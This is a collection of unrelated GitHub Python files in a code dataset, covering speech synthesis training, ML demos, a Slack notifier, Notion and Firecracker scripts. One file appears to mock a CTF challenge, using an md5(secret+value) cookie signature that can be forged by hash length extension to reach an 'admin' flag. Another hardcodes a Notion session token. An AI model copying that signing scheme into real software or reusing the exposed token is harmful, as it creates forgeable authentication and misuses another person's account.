= ckpt_dict['iteration']\n\treturn model, optimizer, iteration\n\n\ndef save_checkpoint(model, optimizer, iteration, ckpt_pth):\n\ttorch.save({'model': model.state_dict(),\n\t\t\t\t'optimizer': optimizer.state_dict(),\n\t\t\t\t'iteration': iteration}, ckpt_pth)\n\ndef plot_data(data, figsize = (16, 4)):\n\tfig, axes = plt.subplots(1, len(data), figsize = figsize)\n\tfor i in range(len(data)):\n\t\taxes[i].imshow(data[i], aspect = 'auto', origin = 'bottom')\n\ndef plot(output, pth):\n\tmel_outputs, mel_outputs_postnet, alignments = output\n\tplot_data((to_arr(mel_outputs[0]),\n\t\t\t\tto_arr(mel_outputs_postnet[0]),\n\t\t\t\tto_arr(alignments[0]).T))\n\tplt.savefig(pth+'.png')\n\n\ndef audio(output, pth):\n\tmel_outputs, mel_outputs_postnet, _ = output\n\twav_postnet = inv_melspectrogram(to_arr(mel_outputs_postnet[0]))\n\tsave_wav(wav_postnet, pth+'.wav')\n\n\ndef save_mel(output, pth):\n\tmel_outputs, mel_outputs_postnet, _ = output\n\tnp.save(pth+'.npy', to_arr(mel_outputs_postnet[0]).T)\n\ndef warm_start_model(checkpoint_path, model, ignore_layers,optimeizer):\n\tassert os.path.isfile(checkpoint_path)\n\tprint(\"Warm starting model from checkpoint '{}'\".format(checkpoint_path))\n\tcheckpoint_dict = torch.load(checkpoint_path, map_location='cpu')\n\tmodel_dict = checkpoint_dict['model']\n\tif len(ignore_layers) > 0:\n\t\tmodel_dict = {k: v for k, v in model_dict.items()\n\t\t\t\t\t if k not in ignore_layers}\n\t\tdummy_dict = model.state_dict()\n\t\tdummy_dict.update(model_dict)\n\t\tmodel_dict = dummy_dict\n\tmodel.load_state_dict(model_dict)\n\toptimeizer.load_state_dict(checkpoint_dict['optimizer'])\n\treturn model\n\n\ndef train(args):\n\t# build model\n\tmodel = Tacotron2()\n\tmode(model, True)\n\tif hps.fp16_run:\n\t\tmodel.decoder.attention_layer.score_mask_value = finfo('float16').min\n\n\toptimizer = torch.optim.Adam(model.parameters(), lr = hps.lr,\n\t\t\t\t\t\t\t\tbetas = hps.betas, eps = hps.eps,\n\t\t\t\t\t\t\t\tweight_decay = hps.weight_decay)\n\n\tif hps.fp16_run:\n\t\tfrom apex import amp\n\t\tmodel, optimizer = amp.initialize(model, optimizer, opt_level='O2')\n\n\tcriterion = Tacotron2Loss()\n\t\n\t# load checkpoint\n\titeration = 1\n\tif args.ckpt_pth != '':\n\t\tif hps.warm_start:\n\t\t\tmodel = warm_start_model(args.ckpt_pth, model, hps.ignore_layers,optimizer)\n\t\t\titeration += 1\n\t\telse:\n\t\t\tmodel, optimizer, iteration = load_checkpoint(args.ckpt_pth, model, optimizer)\n\t\t\tprint('load from :', args.ckpt_pth)\n\t\t\titeration += 1 # next iteration is iteration+1\n\t\t\t# iteration = 1\n\t\n\t# get scheduler\n\tif hps.sch:\n\t\tlr_lambda = lambda step: hps.sch_step**0.5*min((step+1)*hps.sch_step**-1.5, (step+1)**-0.5)\n\t\tif args.ckpt_pth != '':\n\t\t\tscheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda, last_epoch = iteration)\n\t\telse:\n\t\t\tscheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)\n\t\n\t# make dataset\n\ttrain_loader = prepare_dataloaders(args.data_dir)\n\t\n\t# get logger ready\n\tif args.log_dir != '':\n\t\tif not os.path.isdir(args.log_dir):\n\t\t\tos.makedirs(args.log_dir)\n\t\t\tos.chmod(args.log_dir, 0o775)\n\t\tlogger = Tacotron2Logger(args.log_dir)\n\n\t# get ckpt_dir ready\n\tif args.ckpt_dir != '' and not os.path.isdir(args.ckpt_dir):\n\t\tos.makedirs(args.ckpt_dir)\n\t\tos.chmod(args.ckpt_dir, 0o775)\n\t\n\tmodel.train()\n\t# ================ MAIN TRAINNIG LOOP! ===================\n\twhile iteration <= hps.max_iter:\n\t\tfor batch in train_loader:\n\t\t\tif iteration > hps.max_iter:\n\t\t\t\tbreak\n\t\t\tstart = time.perf_counter()\n\t\t\tx, y = model.parse_batch(batch)\n\t\t\ty_pred = model(x)\n\n\t\t\t# loss\n\t\t\tloss, item = criterion(y_pred, y, iteration)\n\n\t\t\t# zero grad\n\t\t\tmodel.zero_grad()\n\n\t\t\tif hps.fp16_run:\n\t\t\t\twith amp.scale_loss(loss, optimizer) as scaled_loss:\n\t\t\t\t\tscaled_loss.backward()\n\t\t\telse:\n\t\t\t\tloss.backward()\n\n\t\t\tif hps.fp16_run:\n\t\t\t\tgrad_norm = torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), hps.grad_clip_thresh)\n\t\t\t\tis_overflow = math.isnan(grad_norm)\n\t\t\telse:\n\t\t\t\tgrad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), hps.grad_clip_thresh)\n\t\t\t\n\t\t\t# backward, grad_norm, and update\n\t\t\t# loss.backward()\n\t\t\t# grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), hps.grad_clip_thresh)\n\n\t\t\toptimizer.step()\n\t\t\tif hps.sch:\n\t\t\t\tscheduler.step()\n\t\t\t\n\t\t\t# info\n\t\t\tdur = time.perf_counter()-start\n\t\t\tif(iteration % 10 == 0):\n\t\t\t\tprint('Iter: {} Loss: {:.6f} Grad Norm: {:.6f} {:.2f}s/it'.format(\n\t\t\t\t\titeration, item, grad_norm, dur))\n\t\t\t\n\t\t\t# log\n\t\t\tif args.log_dir != '' and (iteration % hps.iters_per_log == 0):\n\t\t\t\tlearning_rate = optimizer.param_groups[0]['lr']\n\t\t\t\tlogger.log_training(item, grad_norm, learning_rate, iteration)\n\t\t\t\n\t\t\t# sample\n\t\t\t# iteration = 0\n\t\t\tif args.log_dir != '' and (iteration % hps.iters_per_sample == 0):\n\t\t\t\tmodel.eval()\n\t\t\t\ti = random.randint(0, len(hps.eg_text) - 1)\n\t\t\t\ttext = hps.eg_text[i]\n\t\t\t\tprint('text:', text)\n\t\t\t\toutput = infer(text, model)\n\t\t\t\tmodel.train()\n\t\t\t\tlogger.sample_training(output, iteration)\n\n\t\t\t\tplot(output, os.path.join(args.ckpt_dir,str(iteration)))\n\t\t\t\taudio(output, os.path.join(args.ckpt_dir,str(iteration)))\n\t\t\t\tsave_mel(output, os.path.join(args.ckpt_dir,str(iteration)))\n\t\t\t\n\t\t\t# save ckpt\n\t\t\tif args.ckpt_dir != '' and (iteration % hps.iters_per_ckpt == 0):\n\t\t\t\tckpt_pth = os.path.join(args.ckpt_dir, 'biaobei_{}.pt'.format(iteration))\n\t\t\t\tprint('hps.n_frames_per_step:',hps.n_frames_per_step)\n\t\t\t\tprint('ckpt_pth:',ckpt_pth)\n\t\t\t\tsave_checkpoint(model, optimizer, iteration, ckpt_pth)\n\n\t\t\titeration += 1\n\tif args.log_dir != '':\n\t\tlogger.close()\n\tprint('train done')\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\n\tdata_dir = './tacotron2/biaobei/training/'\n\tprint('data_dir:',data_dir)\n\tparser.add_argument('--data_dir', type = str, default = data_dir,help = 'directory to load data')\n\tparser.add_argument('--log_dir', type = str, default = './biaobei3/log',help = 'directory to save tensorboard logs')\n\tparser.add_argument('--ckpt_dir', type = str, default = './biaobei3/ckpt',help = 'directory to save checkpoints')\n\tparser.add_argument('--ckpt_pth', type = str, default = '',help = 'path to load checkpoints')\n\n\targs = parser.parse_args()\n\tprint(\"FP16 Run:\", hps.fp16_run)\n\tprint(\"hps.n_symbols:\", hps.n_symbols)\n\tprint('hps.n_frames_per_setp:',hps.n_frames_per_step)\n\ttorch.backends.cudnn.enabled = True\n\ttorch.backends.cudnn.benchmark = False # faster due to dynamic input shape\n\ttrain(args)\n","repo_name":"wqt2019/tacotron-2_wavernn","sub_path":"train_tacotron2.py","file_name":"train_tacotron2.py","file_ext":"py","file_size_in_byte":7265,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"53"} +{"seq_id":"16270808018","text":"import os\r\nimport numpy as np\r\nimport torch\r\nfrom PIL import Image\r\nfrom torch.utils.data import Dataset, WeightedRandomSampler\r\n# import albumentations as A\r\n# from albumentations.pytorch.transforms import ToTensorV2\r\n\r\nclass RealPastedGlasses(Dataset):\r\n def __init__(self, real_root, pasted_root, transform = None):\r\n self.real_root = real_root\r\n self.pasted_root = pasted_root\r\n\r\n self.real = os.listdir(real_root)\r\n self.pasted = os.listdir(pasted_root)\r\n self.len_real = len(self.real)\r\n self.len_pasted = len(self.pasted)\r\n self.transform = transform\r\n\r\n def __len__(self):\r\n return self.len_real + self.len_pasted\r\n\r\n def __getitem__(self, i):\r\n if i < self.len_real:\r\n img = np.array(Image.open(os.path.join(self.real_root, self.real[i])))\r\n mask = np.ones((img.shape[0], img.shape[1]))\r\n cls = torch.FloatTensor([1, 0])\r\n else:\r\n img = np.array(Image.open(os.path.join(self.pasted_root, self.pasted[i - self.len_real])))\r\n mask = np.mean(img[:,144:,:],axis=2)\r\n img = img[:,:144,:]\r\n cls = torch.FloatTensor([0, 1])\r\n\r\n mask[mask == 255.0] = 1.0\r\n album = self.transform(image=img, mask=mask)\r\n return album[\"image\"], album[\"mask\"].unsqueeze(0), cls\r\n\r\nclass RealGlasses(Dataset):\r\n def __init__(self, real_root, transform):\r\n self.root = real_root\r\n self.real = os.listdir(real_root)\r\n self.transform = transform\r\n\r\n def __len__(self):\r\n return len(self.real)\r\n\r\n def __getitem__(self, i):\r\n img = np.array(Image.open(os.path.join(self.root, self.real[i])))\r\n album = self.transform(image=img)\r\n target_cls = torch.FloatTensor([0, 1])\r\n # target_cls = torch.FloatTensor([1, 0])\r\n return album[\"image\"], target_cls\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from torch.utils.data import DataLoader\r\n from utils import *\r\n from torch.utils.data import WeightedRandomSampler\r\n class_weight = [1 / len(os.listdir(\"E:/finalyrs_project/real_imgs\")), 1 / len(os.listdir(\"E:/finalyrs_project/DatasetAugmentation/pasted\"))]\r\n dataset = RealPastedGlasses(\"E:/finalyrs_project/real_imgs\",\"E:/finalyrs_project/DatasetAugmentation/pasted\", transform=transform)\r\n real_weight = [1 / len(os.listdir(\"E:/finalyrs_project/real_imgs\"))] *len(os.listdir(\"E:/finalyrs_project/real_imgs\"))\r\n fake_weight = [1 / len(os.listdir(\"E:/finalyrs_project/DatasetAugmentation/pasted\"))] *len(os.listdir(\"E:/finalyrs_project/DatasetAugmentation/pasted\"))\r\n sample_weight = real_weight + fake_weight\r\n sampler = WeightedRandomSampler(sample_weight, num_samples=len(sample_weight), replacement=True)\r\n loader = DataLoader(dataset, batch_size=8, pin_memory=True, drop_last=True, sampler=sampler)\r\n\r\n for idx, (image,mask, cls) in enumerate(loader):\r\n print(image.shape,mask.shape, torch.abs(cls - 1))\r\n\r\n\r\n\r\n\r\n","repo_name":"Deepdive543443/StarWarp-Lens-distortion-correction-base-on-StarGAN","sub_path":"Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25616440883","text":"# 匯入套件與函式\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import datasets\r\nfrom matplotlib.colors import ListedColormap\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\n# 匯入資料\r\niris = datasets.load_iris()\r\nX = pd.DataFrame(iris.data, columns = iris.feature_names)\r\ny = pd.DataFrame(iris.target, columns = ['target'])\r\niris = pd.concat([X, y], axis = 1)\r\nprint(iris)\r\n\r\n# 取出要進行邏輯迴歸的資料\r\niris = iris[['sepal length (cm)', 'petal length (cm)', 'target']]\r\niris = iris[iris['target'].isin([0, 1])]\r\nprint(iris)\r\n\r\n# 準備機器學習的訓練集與測試集\r\nX = iris[['sepal length (cm)', 'petal length (cm)']]\r\ny = iris[['target']]\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 0)\r\nprint(\"訓練集的維度:\", X_train.shape)\r\nprint(\"測試集的維度:\", X_test.shape)\r\n\r\n# 將資料標準化 (平均值為0、標準差為1)\r\nX_train_std = StandardScaler().fit_transform(X_train)\r\nX_test_std = StandardScaler().fit_transform(X_test)\r\n\r\n# 建立與訓練邏��迴歸模型\r\nmodel = LogisticRegression()\r\nmodel.fit(X_train_std, y_train['target'])\r\n\r\n# 分類預測結果\r\ny_pred = model.predict(X_test_std)\r\nprint('目標值:', y_test['target'].values)\r\nprint('預測值:', y_pred)\r\nprint('準確率:', model.score(X_test_std, y_test))\r\n\r\nX = X_test_std\r\ny = y_test['target'].values\r\nmarkers = ('o', '^')\r\ncolors = ('red', 'green')\r\ncmap = ListedColormap(colors[:len(np.unique(y))])\r\nx0min, x0max = X[:, 0].min() - 1, X[:, 0].max() + 1\r\nx1min, x1max = X[:, 1].min() - 1, X[:, 1].max() + 1\r\na, b = np.meshgrid(np.arange(x0min, x0max, 0.01), np.arange(x1min, x1max, 0.01)) \r\nZ = model.predict(np.array([a.ravel(), b.ravel()]).T) \r\nZ = Z.reshape(a.shape)\r\nplt.figure(figsize = (9, 6))\r\nplt.contourf(a, b, Z, alpha = 0.3, cmap = cmap)\r\nplt.xlim(a.min(), a.max())\r\nplt.ylim(b.min(), b.max())\r\nfor i, t in enumerate(np.unique(y)): \r\n p = X[y == t]\r\n plt.scatter(x = p[:, 0], y = p[:, 1], c = cmap(i), marker = markers[i], label = t)\r\nplt.xlabel('sepal length [standardized]', size = 20)\r\nplt.ylabel('petal length [standardized]', size = 20)\r\nplt.legend(loc='upper left')\r\nplt.show()","repo_name":"MyDearGreatTeacher/python2022","sub_path":"教科書/Ch16/logic2.py","file_name":"logic2.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"72468787048","text":"# The knows API is already defined for you.\n# return a bool, whether a knows b\n# def knows(a: int, b: int) -> bool:\n\nclass Solution:\n def findCelebrity(self, n: int) -> int:\n\n celebrity = 0\n for p in range(n):\n\n if knows(celebrity, p):\n celebrity = p\n # Corner case. don't forget to add this part.\n for i in range(celebrity):\n if knows(celebrity, i):\n return -1\n\n for p in range(n):\n if not knows(p, celebrity):\n return -1\n return celebrity\n","repo_name":"tech-learner123/leetcode_python","sub_path":"277-medium.py","file_name":"277-medium.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29966719685","text":"#!/usr/bin/env python\n\n# notify-by-label (c) by Lee Webb (nullify005 at gmail dot com)\n#\n# notify-by-label is licensed under a\n# Creative Commons Attribution-ShareAlike 4.0 International License.\n#\n# You should have received a copy of the license along with this\n# work. If not, see .\n\nfrom github import Github\nfrom slacker import Slacker\nimport argparse\nimport sys\nimport logging\nfrom urllib import quote\n\ndef get_gh_labels():\n g = Github(args.ghtoken)\n org = g.get_organization(args.ghorg)\n repo = org.get_repo(args.ghrepo)\n return repo.get_labels()\n\ndef get_pr_strs_for_label(label):\n ret = []\n g = Github(args.ghtoken)\n org = g.get_organization(args.ghorg)\n repo = org.get_repo(args.ghrepo)\n issues = g.search_issues('repo:%s/%s is:pr state:open label:\"%s\"' % (args.ghorg,args.ghrepo,label))\n if issues.totalCount == 0:\n return []\n for issue in issues:\n ipr = issue.pull_request\n pr_id = int(ipr.html_url.split('/')[-1])\n pr = repo.get_pull(pr_id)\n user = pr.user\n ret.append('<%s|%s> by %s @ %s' % (pr.html_url,pr.title,user.name,pr.created_at))\n return ret\n\ndef label_is_intersting(name):\n if not args.labels:\n return True\n labels = args.labels.split(',')\n for l in labels:\n if l in name:\n return True\n return False\n\n## setup the logger\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\nlogging.info('starting')\n\n## arg parser\nparser = argparse.ArgumentParser(description='Scan all open Pull Requests and notify into Slack if there are reviews outstanding')\nparser.add_argument('--ghtoken', dest='ghtoken', required=True, action='store', help='Github API Token')\nparser.add_argument('--ghorg', dest='ghorg', default='Studiosity', action='store', help='Github Organisation')\nparser.add_argument('--ghrepo', dest='ghrepo', default='eureka', action='store', help='Github Repository')\nparser.add_argument('--stoken', dest='stoken', required=True, action='store', help='Slack API Token')\nparser.add_argument('--schannel', dest='schannel', default='#general', action='store', help='Slack Channel')\nparser.add_argument('--suser', dest='suser', default='prcalltoaction', action='store', help='Slack User')\nparser.add_argument('--semoji', dest='semoji', default=':warning:', action='store', help='Slack Emoji Icon')\nparser.add_argument('--verbose', dest='verbose', action='store_true', help='Increase Logging Verbosity')\nparser.add_argument('--labels', dest='labels', default=False, action='store', help='The labels to report on, comma seperated')\nargs = parser.parse_args()\n\n## setup the logger\nif args.verbose:\n logging.getLogger().setLevel(logging.DEBUG)\n\n## main\nlogging.info('Searching %s/%s for Pull Requests by Label' % (args.ghorg,args.ghrepo))\nlabels = get_gh_labels()\nattachments = []\nfor label in labels:\n if not label_is_intersting(label.name):\n logging.info('Ignoring label %s' % (label.name))\n continue\n issues = get_pr_strs_for_label(label.name)\n logging.info('There are %d issues for label: %s' % (len(issues),label.name))\n if issues:\n search = 'repo:%s/%s is:pr state:open label:\"%s\"' % (args.ghorg,args.ghrepo,label.name)\n attachment = {\n 'title': label.name,\n 'title_link': 'https://github.com/search?q=%s' % (quote(search)),\n 'color': '#%s' % (label.color),\n 'text': '\\n'.join(issues),\n 'mrkdwn_in': ['text', 'pretext']\n }\n logging.debug('Appending: %s to attachments for label: %s' % (attachment,label.name))\n attachments.append(attachment)\nif not attachments:\n logging.warning('nothing to do? chips')\n sys.exit(0)\nlogging.info('Sending slack message to channel: %s' % (args.schannel))\nslack = Slacker(args.stoken)\nslack.chat.post_message(\n args.schannel,\n text=' Outstanding Pull Requests for Project ' % (args.ghorg,args.ghrepo,args.ghrepo),\n parse=True,\n attachments=attachments,\n icon_emoji=args.semoji,\n username=args.suser\n)\n","repo_name":"nullify005/github-utilities","sub_path":"notify-by-label.py","file_name":"notify-by-label.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70052383848","text":"'''\nCreated on Mar 20, 2019\n\n@author: sherl\n'''\n\nfrom flask import Flask\nfrom urllib.parse import *\nimport hashlib\nfrom flask import request,make_response,redirect,url_for\n\nSECRET=b'asdfdfg'\n\n\n\napp=Flask(__name__) #创建1个Flask实例\n\n@app.route('/') #路由系统生成 视图对应url,1. decorator=app.route() 2. decorator(first_flask)\ndef hello(): #视图函数\n return 'Hello World' #response\n\n@app.route('/sdf') #路由系统生成 视图对应url,1. decorator=app.route() 2. decorator(first_flask)\ndef hello2(): #视图函数\n return 'error' #response\n\n@app.route(\"/admin\", methods=[\"GET\"]) \ndef admin_page(): \n tep=request.cookies.get(\"auth\")\n print ('get auth len',len(tep), tep)\n auth_cookie = unquote_to_bytes(tep) \n sig_cookie = unquote_to_bytes(request.cookies.get(\"sig\")) \n \n print (len(auth_cookie),auth_cookie)\n print (len(sig_cookie), sig_cookie)\n \n if auth_cookie is None or sig_cookie is None: \n print('one is none')\n return redirect(url_for(\"hello\")) \n \n \n \n if sig_cookie != make_signature(auth_cookie): \n print ('not match:',sig_cookie ,make_signature(auth_cookie))\n resp = make_response(redirect(url_for(\"hello2\"))) \n resp.delete_cookie(\"auth\") \n resp.delete_cookie(\"sig\") \n return resp \n \n print('passed')\n cookie_params = {} \n for p in auth_cookie.split(b\"&\"): \n print (p)\n key, val = p.split(b\"=\") \n cookie_params[key] = val\n \n if cookie_params.get(b\"role\") == b\"admin\": \n return 'FLAG_VALUE' \n else: \n return redirect(url_for(\"hello\")) \n \ndef make_signature(value): \n temp = SECRET + value \n print ('make sig:',len(temp), temp)\n temp=hashlib.md5(temp).hexdigest().encode()\n print (temp)\n return temp\n\n\nif __name__ == '__main__':\n make_signature(b'username=test&role=user')\n app.run('127.0.0.1', 8012, True) #启动socket\n \n \n \n \n ","repo_name":"functionxu123/someproblem","sub_path":"problems/lanctf/fake_flask.py","file_name":"fake_flask.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22342589938","text":"import types\nfrom collections import defaultdict, namedtuple\nfrom datetime import datetime\nfrom typing import TypedDict\n\nfrom framework.utils import ExceptionAggregator\n\nfrom .consumer import Consumer, ProcessingException\nfrom .producer import Producer\n\n\nclass CoreException(ExceptionAggregator):\n \"\"\"Exception used to return core messages.\n\n The caller should handle the exception accordingly.\n \"\"\"\n\n def __init__(self, result=None):\n \"\"\"Initialize the exception.\"\"\"\n super().__init__()\n self.result = result\n\n\nclass Result(TypedDict):\n \"\"\"Data class for aggregated statistic results.\"\"\"\n\n name: str\n iterations: int\n results: dict\n custom: dict\n\n\nPipe = namedtuple(\"Pipe\", \"producer consumer\")\n\n\nclass Core:\n \"\"\"Base class for statistics core driver.\"\"\"\n\n # pylint: disable=W0102\n def __init__(self, name=\"\", iterations=1, custom={}):\n \"\"\"Core constructor.\"\"\"\n self._pipes = defaultdict(Pipe)\n self._result = Result(\n name=name, iterations=iterations, results={}, custom=custom\n )\n self._failure_aggregator = CoreException()\n self.metrics_test = None\n self.metrics = None\n self.check_baseline = True\n\n def add_pipe(self, producer: Producer, consumer: Consumer, tag=None):\n \"\"\"Add a new producer-consumer pipe.\"\"\"\n if tag is None:\n tag = self._result[\"name\"] + \"_\" + str(datetime.timestamp(datetime.now()))\n self._pipes[tag] = Pipe(producer, consumer)\n\n def run_exercise(self, fail_fast=False) -> Result:\n \"\"\"Drive the statistics producers until completion.\"\"\"\n iterations = self._result[\"iterations\"]\n\n for tag, pipe in self._pipes.items():\n for iteration in range(iterations):\n raw_data = pipe.producer.produce()\n if not isinstance(raw_data, types.GeneratorType):\n raw_data = [raw_data]\n for data in raw_data:\n raws = pipe.consumer.ingest(iteration, data)\n if raws is not None:\n dimensions = self.custom.copy()\n test = tag.split(\"/\")[-1]\n dimensions[\"test\"] = test\n dimensions[\"performance_test\"] = self.name\n self.metrics.set_dimensions(dimensions)\n for name, val, unit in raws:\n self.metrics.put_metric(name, val, unit)\n self.metrics.set_property(\"iteration\", iteration)\n self.metrics.flush()\n\n try:\n stats, custom = pipe.consumer.process(check=self.check_baseline)\n except (ProcessingException, AssertionError) as err:\n self._failure_aggregator.add_row(f\"Failed on '{tag}':\")\n self._failure_aggregator.add_row(err)\n stats = err.stats\n custom = err.custom\n if fail_fast:\n raise self._failure_aggregator\n\n self._result[\"results\"][tag] = stats\n\n # Custom information extracted from all the iterations.\n if len(custom) > 0:\n self._result[\"custom\"][tag] = custom\n\n self.raise_if_regression()\n return self._result\n\n def raise_if_regression(self):\n \"\"\"Raise an exception if there was an issue or a regression was\n detected.\n \"\"\"\n if self._failure_aggregator.has_any():\n self._failure_aggregator.result = self._result\n # If we had Python 3.11 we could use ExceptionGroup\n raise self._failure_aggregator\n\n @property\n def name(self):\n \"\"\"Return statistics name.\"\"\"\n return self._result[\"name\"]\n\n @name.setter\n def name(self, name):\n \"\"\"Set statistics name.\"\"\"\n self._result[\"name\"] = name\n\n @property\n def iterations(self):\n \"\"\"Return statistics iterations count.\"\"\"\n return self._result[\"iterations\"]\n\n @iterations.setter\n def iterations(self, iterations):\n \"\"\"Set statistics iterations count.\"\"\"\n self._result[\"iterations\"] = iterations\n\n @property\n def custom(self):\n \"\"\"Return statistics custom information.\"\"\"\n return self._result[\"custom\"]\n\n @custom.setter\n def custom(self, custom):\n \"\"\"Set statistics custom information.\"\"\"\n self._result[\"custom\"] = custom\n\n @property\n def statistics(self):\n \"\"\"Return statistics gathered so far.\"\"\"\n return self._result\n","repo_name":"firecracker-microvm/firecracker","sub_path":"tests/framework/stats/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":22949,"dataset":"github-code","pt":"53"} +{"seq_id":"70745237929","text":"from django.conf.urls import url, include\nfrom . import views\n\nurlpatterns = [ \n url(r'^about/', views.about, name='about'),\n url(r'^sitemap/', views.sitemap, name='sitemap'),\n url(r'^contact/', views.contact, name='contact'),\n url(r'^list_all_posts/', views.list_all_posts, name='list_all_posts'),\n url(r'^$',views.blog, name='blog'),\n url(r'^(?P[^/]+)/$', views.readblog, name='readblog'),\n ]","repo_name":"iamvarunsekhar/Personal-Blog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35300540407","text":"from notion.client import NotionClient\n\n\nclient = NotionClient(token_v2=\"39ef1ddd36f6d1df766f496a75449093fadf1aa6c4c1e3442602754bc82c918a032bc025d4c5956801b58bc88fe10d950b6e844fa24b1951a095c3dde43a37ca7a509f77169389a97a70dc74baf5\")\n\nurl = 'https://www.notion.so/API-TEST-c6b9d18ec0f444928982c7c387c6013a'\n\npage = client.get_block(url)\n\n\n# Read page title\npage.title\n\n# Set page title\npage.title = \"API test commit\"\n\n# Blocks\npage.children\n\nfor child in page.children:\n print(child.title)\n\n\n# DATABASES\n\nurl_db = 'https://www.notion.so/3457774311c54092b2dc4e0693e638bd?v=430b979a9640427185c9f9a3460b2fdf'\n\n# Access a database using the URL of the database page or the inline block\ncv = client.get_collection_view(url_db)\n\ncv.collection.get_rows()\n\n# List all the records with \"Bob\" in them\nfor row in cv.collection.get_rows(search=\"Oppgave\"):\n print(\"We estimate the value of '{}' at {}\".format(row.name, row.estimated_value))\n\n\n\n\n# Add a new record\nrow = cv.collection.add_row()\nrow.name = 'Oppgave 6'","repo_name":"marcus-gt/todoist-to-notion","sub_path":"notion-committer.py","file_name":"notion-committer.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7023645122","text":"import json\nimport sys, getopt, os\nimport datetime\nsys.path.append(r'../')\nsys.path.append(os.path.abspath('./efinance'))\n\nfrom ultility.common_def import *\nfrom ultility.common_func import *\n\nfrom ultility.stock_codes_utility import stock_codes_utility as SCU\nfrom data_set.finance_data.data_download import data_download\nfrom data_set.finance_data.finance_factor_calc import *\nfrom data_set.finance_data.finance_factor_rank import *\nfrom data_set.process_data.process_daily_trade import process_daily_trade\nfrom data_set.process_data.process_detailed_trade import *\n\ndef finance_factor_process(conf):\n \n common_conf = conf['common']\n folder = common_conf[\"folder\"]\n path = common_conf['path']\n path_stock = os.path.join(path, folder['data_stock'])\n path_rank = os.path.join(path, folder[\"finance_rank\"])\n\n finance_conf = conf['finance']\n result_name = finance_conf['result_name']\n dates = finance_conf['dates']\n factors = finance_conf['factors']\n\n scu = SCU(path, CONST_DEF.TYPE_STOCK)\n # stock_codes = scu.stock_codes()\n stock_codes = scu.stock_codes_from_table()\n print(stock_codes)\n # stock_codes = ['600032']\n\n # process quarter trade\n daily_trade_data = process_daily_trade(path, path_stock, path_stock)\n daily_trade_data.trade_data_quarter(stock_codes)\n\n # need to disable following code when debug\n stock_codes = scu.skip_stock_codes(stock_codes)\n\n # factors caculate\n ffc = finance_factor_calc(path, path_stock, path_stock)\n ffc.stock_factors_calc(stock_codes)\n\n # rank the factor\n finance_factors_rank(path_stock, path_rank, result_name, stock_codes, dates, factors)\n\ndef daily_stock_trade_process(path, folder_in, folder_out, trade_ouput_file, codes_names):\n path_in = os.path.join(path, folder_in)\n path_out = os.path.join(path, folder_out)\n # stock_codes = ['002830']\n # need to disable following code when debug\n # stock_codes = scu.skip_stock_codes(stock_codes)\n #process daily trade data\n daily_trade_data = process_daily_trade(path, path_in, path_out)\n daily_trade_data.index_price_volume_ratio(codes_names, trade_ouput_file)\n\ndef detailed_trade_process(path, folder_in, folder_out, data_type):\n\n path_in = os.path.join(path, folder_in)\n path_out = os.path.join(path, folder_out)\n scu = SCU(path, data_type)\n stock_codes = scu.stock_codes_from_table()\n # stock_codes = ['000001']\n # stock_codes = ['002830']\n\n detailed_trade_process = detailed_trade(path, path_in, path_out)\n detailed_trade_process.statistic_detailed_bills(stock_codes)\n\ndef daily_trade_process(conf):\n\n common_conf = conf['common']\n folder = common_conf[\"folder\"]\n path = common_conf['path']\n trade_conf = conf['trade']\n\n finance_163_daily_trade_factor = trade_conf['finance_163_daily_trade_factor']\n stock_163_daily_trade_factor = trade_conf['stock_163_daily_trade_factor']\n stock_163_detailed_trade_factor = trade_conf['stock_163_detailed_trade_factor']\n index_163_daily_trade_factor = trade_conf['index_163_daily_trade_factor']\n block_daily_trade_factor = trade_conf['block_daily_trade_factor']\n\n if finance_163_daily_trade_factor == 'yes':\n finance_factor_process(conf)\n\n if stock_163_daily_trade_factor == 'yes':\n scu = SCU(path, CONST_DEF.TYPE_STOCK)\n codes_names = scu.stock_codes_names_from_table()\n daily_stock_trade_process(path, folder['data_stock'], folder['process_trade'], trade_conf['stock_trade_ratio_file'], codes_names)\n\n if block_daily_trade_factor == 'yes':\n scu = SCU(path, CONST_DEF.TYPE_INDEX)\n codes_names = scu.block_codes_names_from_eastmoney('indurstry')\n daily_stock_trade_process(path, folder['data_index'], folder['process_trade'], trade_conf['block_trade_ratio_file'], codes_names)\n\n if stock_163_detailed_trade_factor == \"yes\":\n folder_in = folder['data_detailed_stock']\n folder_out = folder['data_stock']\n detailed_trade_process(path, folder_in, folder_out, CONST_DEF.TYPE_DETAILED_STOCK)\n\n\nif __name__ == 